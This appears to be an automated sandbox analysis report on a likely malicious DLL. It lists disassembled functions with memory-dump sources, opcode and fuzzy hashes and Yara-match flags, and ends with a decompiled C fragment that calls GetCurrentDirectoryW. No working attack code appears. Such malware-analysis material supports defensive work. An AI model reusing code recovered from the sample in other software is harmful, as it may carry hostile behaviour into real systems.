                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,6E4BE39C,?,?,?,?,?,?,00000000), ref: 6E4BE5CE
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID:
                          • API String ID: 3997070919-0
                          • Opcode ID: 052b0bc1076bb8edbb968e2744d91e9ca62a6efec9e8b5f676fc256003f48b3a
                          • Instruction ID: d0bbf327e9ccff0a3dc35fdf778f8d48a50868f614d39052691c1eefb57f5d8f
                          • Opcode Fuzzy Hash: 052b0bc1076bb8edbb968e2744d91e9ca62a6efec9e8b5f676fc256003f48b3a
                          • Instruction Fuzzy Hash: 7DB15831610609CFD744CF68C4D6F557BA0FF85364F65869AE8AACF2A1C335E982CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BA584, Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E4BA59A
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FeaturePresentProcessor
                          • String ID:
                          • API String ID: 2325560087-0
                          • Opcode ID: e71b822980151f163b9d4644afbed212b4625f233ebf2f2e09ed0637dd0a3173
                          • Instruction ID: 4a53b1a6c5c3d8c3d031fbe9d8130b3a0b27770e36b7e8af00d5b388acc45f1a
                          • Opcode Fuzzy Hash: e71b822980151f163b9d4644afbed212b4625f233ebf2f2e09ed0637dd0a3173
                          • Instruction Fuzzy Hash: 73518BB1A116068FDB44CFA9E991B9AB7F4FF89720F10802AC456EB344E374A910DF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C0927, Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9ae3168850bebb757e37bb81641a013936eee7aec7bf4e0fc8acd8c893b5699a
                          • Instruction ID: 83ca3a1824479b4f937dea9a9b8c31826e0d494860bd68748646d1abf4873e76
                          • Opcode Fuzzy Hash: 9ae3168850bebb757e37bb81641a013936eee7aec7bf4e0fc8acd8c893b5699a
                          • Instruction Fuzzy Hash: 8B41A2B9805219AEDB50DFB9CC98EEABBBDAF45704F1442DEE408D3200E7319E848F51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4B10C0, Relevance: 1.6, Strings: 1, Instructions: 365COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: UNC\
                          • API String ID: 0-505053535
                          • Opcode ID: d620fc518675fc28675e1ff20e86966a573eda328e389dca88eaf7b8ee40f90d
                          • Instruction ID: 10e370cbbbcf9440537bde63f367b7697da4f65ba33903e2d2ae6bcbc0410fe5
                          • Opcode Fuzzy Hash: d620fc518675fc28675e1ff20e86966a573eda328e389dca88eaf7b8ee40f90d
                          • Instruction Fuzzy Hash: 81D1E8316087098FD310CEBAC4C0E5AB7E3AF85354F14875AD4A89B395E631DD4ECBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C4D1E, Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: +=
                          • API String ID: 0-959356335
                          • Opcode ID: 5d76f859758488d71fd0052261c370138b143293de555935aa9f4a50df3f4ddd
                          • Instruction ID: f2c6b1cb7c058a69ccff2360a5acd45ef177728cca0b9959ab1794f101148fe9
                          • Opcode Fuzzy Hash: 5d76f859758488d71fd0052261c370138b143293de555935aa9f4a50df3f4ddd
                          • Instruction Fuzzy Hash: 80A18575D00309EBCF18CFA8D98AADEBBB1FF54324F208049E111BA290D7B55A46CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CFA78, Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcmpi
                          • String ID: y)W
                          • API String ID: 1586166983-252666296
                          • Opcode ID: 4709e35d14353aba54ce045cad582b1c42f9ab39db6cd2adb0d0012b0d42681d
                          • Instruction ID: 59da54dbdbb3bae53b2f9454e85e29eea99009b4c9eefcfbcb7c0e7d89532264
                          • Opcode Fuzzy Hash: 4709e35d14353aba54ce045cad582b1c42f9ab39db6cd2adb0d0012b0d42681d
                          • Instruction Fuzzy Hash: 12911272D01209EBDF08CFE5D98A9DEFBB2FB48304F208019E111BA260D7B55A56CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C46FA, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: vF`
                          • API String ID: 0-1152140331
                          • Opcode ID: 03440bb8ffa85d6619823c085b054145fe0dbf962a45d3bb23a8cd5bf75ca48f
                          • Instruction ID: 58d13a817dbfd650840c3b716d343688cbe3b970923d0529995aa0b5fbc88604
                          • Opcode Fuzzy Hash: 03440bb8ffa85d6619823c085b054145fe0dbf962a45d3bb23a8cd5bf75ca48f
                          • Instruction Fuzzy Hash: CA9158B28083419FC358CF24D48990BBBF0BBA9358F504A1DF5D997224E3B1DA498F97
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001DE5A7, Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Hlf
                          • API String ID: 0-3964790188
                          • Opcode ID: 95fde37c6f15444079cf5d161cab7319be91c678421980405c7c883a68ac2ccc
                          • Instruction ID: ecdf3da5128cc19680317dd29b63f20fded685830af1f5b283a8d265381632a0
                          • Opcode Fuzzy Hash: 95fde37c6f15444079cf5d161cab7319be91c678421980405c7c883a68ac2ccc
                          • Instruction Fuzzy Hash: 777101721083009FC758DF65898941FBEF1FBC9758F10491DF29696260C3B68A48CF87
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C358B, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: xmK
                          • API String ID: 0-2499702024
                          • Opcode ID: e5cee715ce3799c43bd2f33cf69dcbc8517b3b809f9afd3c89dd54b5c35a0ee9
                          • Instruction ID: d3e0b9c521e477f250918f2ea1961f71492ae617ec9e1728869080a2f976b74e
                          • Opcode Fuzzy Hash: e5cee715ce3799c43bd2f33cf69dcbc8517b3b809f9afd3c89dd54b5c35a0ee9
                          • Instruction Fuzzy Hash: EA5197711083419BC348CF25C98591FFBE6FBE8798F504A0DF1A256260D7B1DA49CB83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CFE9D, Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: >.,
                          • API String ID: 0-3899356231
                          • Opcode ID: 80ca77ab81a6ca596eb6c22bf9cfe8eb59dbd83d466197c65e426a5e5260b08c
                          • Instruction ID: aab05cf703a0bee9349f99df92abe39a1838d81b7a8ce65892208c544a8cb6c5
                          • Opcode Fuzzy Hash: 80ca77ab81a6ca596eb6c22bf9cfe8eb59dbd83d466197c65e426a5e5260b08c
                          • Instruction Fuzzy Hash: A8514571109341DFC348CF25D94990BBBE1FBC8748F548A1EF5DAA6220C771EA1A8F46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D62F5, Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: lG&
                          • API String ID: 0-3552163689
                          • Opcode ID: 27db70a23f4f822cbd6f42d8de7376af5ee562709769366d169a5d4c427b5d12
                          • Instruction ID: 3a188b32379b2e029105e418bea075fbac01fbfbda5771173786854624036f10
                          • Opcode Fuzzy Hash: 27db70a23f4f822cbd6f42d8de7376af5ee562709769366d169a5d4c427b5d12
                          • Instruction Fuzzy Hash: 194175B26083418FC718CF25C84592BBBF1FF99748F00092DF59686220D3B2DA18CF96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C4B81, Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-2740779761
                          • Opcode ID: 2583b2e681538ba774d54878540d3d5e27670afb98d65ccb76e1b5f6369f190b
                          • Instruction ID: d791628a85686793efe19e8f1ece146d179eda7f87cdeb46a5e590da67b3754b
                          • Opcode Fuzzy Hash: 2583b2e681538ba774d54878540d3d5e27670afb98d65ccb76e1b5f6369f190b
                          • Instruction Fuzzy Hash: C04115B2D0121DEBDF58CFA1C84A9EEBBB5FB04314F208149E510BA160E3B55A548F94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001DD7BE, Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .#q
                          • API String ID: 0-1413055539
                          • Opcode ID: 15b1b5337777c2c55cc1d9853df7d2d7c26164500b6eb4ab7dcd3c2ea191553c
                          • Instruction ID: 66ae96f21d10d5aa0ddf831710bc386c3c1069fe3d84b5ce3a14ff23217955af
                          • Opcode Fuzzy Hash: 15b1b5337777c2c55cc1d9853df7d2d7c26164500b6eb4ab7dcd3c2ea191553c
                          • Instruction Fuzzy Hash: 2041BF715083428BC758DF29E49542FFBE6FBE4748F500A2EF58696251D770DA48CB83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D56E9, Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: {5H
                          • API String ID: 0-2111002039
                          • Opcode ID: 80b95965e388f351ea382bcef8fc715d8cc87b2dfd1519f2d91d7977e42f6dd6
                          • Instruction ID: a4f5410e8bfb3b01aae61016ac5e893ab35a134e7550f4a6ed3c3a491968099c
                          • Opcode Fuzzy Hash: 80b95965e388f351ea382bcef8fc715d8cc87b2dfd1519f2d91d7977e42f6dd6
                          • Instruction Fuzzy Hash: BF410375D0020DABCF04DFE5C88A8EEBBB6FF48314F208159E911B6260D3B55A55CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C387F, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: F*
                          • API String ID: 0-1010906026
                          • Opcode ID: c1e9306e473ed8024b7aecb87229ffce444de190ddcd1060875ed32e6c75c0ad
                          • Instruction ID: 62f131e99cdcbddd69a0ed0ab2d71b5cb5cd8dd0204bf6285ccf8f382bd9aff2
                          • Opcode Fuzzy Hash: c1e9306e473ed8024b7aecb87229ffce444de190ddcd1060875ed32e6c75c0ad
                          • Instruction Fuzzy Hash: 5C319772A083408FC314DF29C58581BFBE0FB98708F444B6DF889A7211C774DA09CB96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C3432, Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ? 7
                          • API String ID: 0-753378918
                          • Opcode ID: ccef6d168c0bcb7b65ad1028735a4f14b318d61ec9ca826cfe835b05fc1a8f41
                          • Instruction ID: 8b78a579c53e9e9dcb734868758719b51f27def37624fa89554b22526a63d9cc
                          • Opcode Fuzzy Hash: ccef6d168c0bcb7b65ad1028735a4f14b318d61ec9ca826cfe835b05fc1a8f41
                          • Instruction Fuzzy Hash: 0741FFB5D0120AEBCF48DFE5CA4A8AEBBB0FB44304F208459D411B7264D3B44B05CF95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4A3A90, Relevance: .5, Instructions: 489COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 47506d0d3ef04b80a4b292ffde898f31bd8fedda9acfb8f8ac2841448d2d1596
                          • Instruction ID: 66316ba135027a7558881eaed69b70b7b0b0fe708fdcd49be62ddad9253832b4
                          • Opcode Fuzzy Hash: 47506d0d3ef04b80a4b292ffde898f31bd8fedda9acfb8f8ac2841448d2d1596
                          • Instruction Fuzzy Hash: 4302E231A187158FD315DE7DC48062AF3E2AFEA350F11C72EE945A7359EBB0AC428781
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C800A, Relevance: .3, Instructions: 269COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ed8196f0aa1fc5fd9d653b47fadaabd7a77719c49fdf8dc4ee39cd8fb6cfb99c
                          • Instruction ID: 2f88faea7324dedfe7649e9a751af9aee0dd53028f2727c635a2fca7be0b4ed1
                          • Opcode Fuzzy Hash: ed8196f0aa1fc5fd9d653b47fadaabd7a77719c49fdf8dc4ee39cd8fb6cfb99c
                          • Instruction Fuzzy Hash: 08C140711083819FC358CF26C489A5BBFE2FBD9358F109A1EF6959A260D7B1C949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C75D2, Relevance: .1, Instructions: 111COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fcd4780139018cdfdc0b48cc4ebd783c70dfdf5c4fbb4a90df3cf74f7bc0d132
                          • Instruction ID: a99e67addb3cf3817bd2970901ed732ced72687b85c69cbc66e652ec85f892b3
                          • Opcode Fuzzy Hash: fcd4780139018cdfdc0b48cc4ebd783c70dfdf5c4fbb4a90df3cf74f7bc0d132
                          • Instruction Fuzzy Hash: 974157711083429FC718DF25D94A82BBBE5FBD4748F10892EF596A6261D3B1DA09CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C51EC, Relevance: .1, Instructions: 100COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 27bc0dd3af28b2b8866cf3a5b7345e660d1b77f5f934cc889c342029ca7dab82
                          • Instruction ID: 05f3465065ec31d1c60bff0a99eed14f82a04b9722b68ec29f83e11981843b91
                          • Opcode Fuzzy Hash: 27bc0dd3af28b2b8866cf3a5b7345e660d1b77f5f934cc889c342029ca7dab82
                          • Instruction Fuzzy Hash: E24179711083069FC708DF21999582FBBE6FBE4748F54492DF886A6220D771DA49CF93
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D0A93, Relevance: .1, Instructions: 64COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 879ec4826f385fb418c48e78aa5f59a1b30a62271abb2aa3063de3463b55ef21
                          • Instruction ID: 7a5bb3eee9938f57bcfbddc5d2fa1bfeb4dd5309f3c3be7f93e8a8ba50a5b4cd
                          • Opcode Fuzzy Hash: 879ec4826f385fb418c48e78aa5f59a1b30a62271abb2aa3063de3463b55ef21
                          • Instruction Fuzzy Hash: 43313475C0021DEBCF44DFE4D88A5AEBFB5FB14318F20859AD512A6210C3B48B45CFA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D282D, Relevance: .1, Instructions: 51COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f3b398f48dae94253601706a75db96206645b053db3457b9ee22facfc9da846
                          • Instruction ID: 65a022c51a9ea59d904d56d5322068993000e337cc241d1555aa212d7af7702e
                          • Opcode Fuzzy Hash: 6f3b398f48dae94253601706a75db96206645b053db3457b9ee22facfc9da846
                          • Instruction Fuzzy Hash: C0114376D0020CFBDF09DFA4C90A99EBBB2FB44300F10C089E914AB250D7B2AB259F40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4B9920, Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8bee60848518029f6e0da757069098c62b4a5578de4040b216c04e28793eeadf
                          • Instruction ID: 2e0b954eb6fc81651daa971cbba54761ef6ef6b8a65c52fde16fe2cfe1b58268
                          • Opcode Fuzzy Hash: 8bee60848518029f6e0da757069098c62b4a5578de4040b216c04e28793eeadf
                          • Instruction Fuzzy Hash: AD0169323112018FEBD8CFB8C4A0E2A77E6BF5A654F5444AAD516CB725DB36E800CA61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C02CC, Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
                          • Instruction ID: 4ba1e3aeee7e4e0e513596d06d7b9cd485c2f61fe64fb93da55025989f77bcc5
                          • Opcode Fuzzy Hash: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
                          • Instruction Fuzzy Hash: 3EE08CB2911238EBCB10CBE8C900E8AF3FCEB44E84B11049BB511E3200D270DE00C7C1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BEC0B, Relevance: .0, Instructions: 12COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
                          • Instruction ID: f8cdcbe863d8379904dbecf9ad108bbd044b7785d7beecdccfdecdb9a3f0d9c2
                          • Opcode Fuzzy Hash: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
                          • Instruction Fuzzy Hash: B1C08CB800190446CE05997092B0BA43378E3C2B82F902CCEC80A4B782E62EBC87D621
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D07D2, Relevance: .0, Instructions: 2COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                          • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                          • Instruction Fuzzy Hash:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4ADEE0, Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 451memorylibraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E4ADEE0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, long _a8) {
				void* _v16;
				char _v1456;
				void* __ebp;
				void _t191;
				void* _t194;
				long _t195;
				signed int _t200;
				void* _t201;
				void* _t204;
				void* _t205;
				long _t206;
				char _t208;
				void* _t217;
				void* _t218;
				void* _t221;
				void* _t227;
				void* _t229;
				void* _t233;
				void* _t235;
				void* _t241;
				void* _t243;
				void* _t244;
				void* _t246;
				void* _t250;
				void* _t252;
				long _t260;
				long _t262;
				void* _t263;
				void* _t264;
				char _t265;
				void* _t267;
				void* _t274;
				void* _t284;
				void* _t288;
				long _t291;
				WCHAR* _t293;
				void* _t294;
				WCHAR* _t304;
				long _t305;
				void* _t307;
				void* _t308;
				intOrPtr _t310;
				intOrPtr _t313;
				signed int _t315;
				intOrPtr _t317;
				void* _t318;
				void* _t322;
				void* _t324;

				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t317 = (_t315 & 0xfffffff0) - 0x5b0;
				_t310 = _t317;
				 *((intOrPtr*)(_t310 + 0x598)) = _t313;
				 *((intOrPtr*)(_t310 + 0x59c)) = _t317;
				 *(_t310 + 0x5a8) = 0xffffffff;
				 *((intOrPtr*)(_t310 + 0x5a4)) = E6E4B3B90;
				 *((intOrPtr*)(_t310 + 0x5a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t310 + 0x5a0;
				_t191 =  *_a4;
				 *(_t310 + 0x28) = _t191;
				 *(_t310 + 0xe) = _t191;
				E6E4BC310(__edi, _t310 + 0x190, 0, 0x400);
				_t318 = _t317 + 0xc;
				_t194 =  *0x6e4ed0bc; // 0x2
				_t262 = 0x200;
				 *(_t310 + 0x24) = 0;
				 *(_t310 + 0x2c) = _t194;
				 *(_t310 + 0x30) = 0;
				 *(_t310 + 0x14) = _t194;
				 *(_t310 + 0x34) = 0;
				 *(_t310 + 0x10) = 0x200;
				if(0x200 >= 0x201) {
					L4:
					_t291 =  *(_t310 + 0x24);
					_t263 = _t262 - _t291;
					__eflags =  *(_t310 + 0x30) - _t291 - _t263;
					if( *(_t310 + 0x30) - _t291 < _t263) {
						 *(_t310 + 0x5a8) = 0;
						_t274 = _t310 + 0x2c;
						E6E4C7370(_t274, _t291, _t263);
						_t318 = _t318 + 4;
						 *(_t310 + 0x14) =  *(_t310 + 0x2c);
					}
					_t262 =  *(_t310 + 0x10);
					_t304 =  *(_t310 + 0x14);
					 *(_t310 + 0x34) = _t262;
					 *(_t310 + 0x24) = _t262;
					 *(_t310 + 0x20) = _t304;
					 *(_t310 + 0x1c) = _t262;
				} else {
					L7:
					_t304 = _t310 + 0x190;
					 *(_t310 + 0x1c) = 0x200;
					 *(_t310 + 0x20) = _t304;
				}
				L8:
				SetLastError(0);
				_t195 = GetCurrentDirectoryW(_t262, _t304);
				_t305 = _t195;
				if(_t195 != 0 || GetLastError() == 0) {
					if(_t305 != _t262 || GetLastError() != 0x7a) {
						__eflags = _t305 -  *(_t310 + 0x10);
						_t262 = _t305;
						if(_t305 <  *(_t310 + 0x10)) {
							_t292 =  *(_t310 + 0x1c);
							 *(_t310 + 0x5a8) = 0;
							__eflags = _t305 -  *(_t310 + 0x1c);
							if(__eflags > 0) {
								E6E4C6DB0(_t262, _t305, _t292, _t305, _t310, __eflags, 0x6e4eded0);
								goto L70;
							} else {
								_t293 =  *(_t310 + 0x20);
								_t274 = _t310 + 0x70;
								_push(_t305);
								E6E4B0EC0(_t262, _t274, _t293, _t305, _t310);
								_t318 = _t318 + 4;
								asm("movsd xmm0, [esi+0x70]");
								_t264 = 0;
								 *(_t310 + 0x48) =  *(_t310 + 0x78);
								asm("movsd [esi+0x40], xmm0");
								_t200 =  *(_t310 + 0x30);
								__eflags = _t200;
								if(_t200 != 0) {
									goto L18;
								} else {
								}
								goto L21;
							}
						} else {
							__eflags = _t262 - 0x201;
							 *(_t310 + 0x10) = _t262;
							if(_t262 < 0x201) {
								goto L7;
							} else {
								goto L4;
							}
							goto L8;
						}
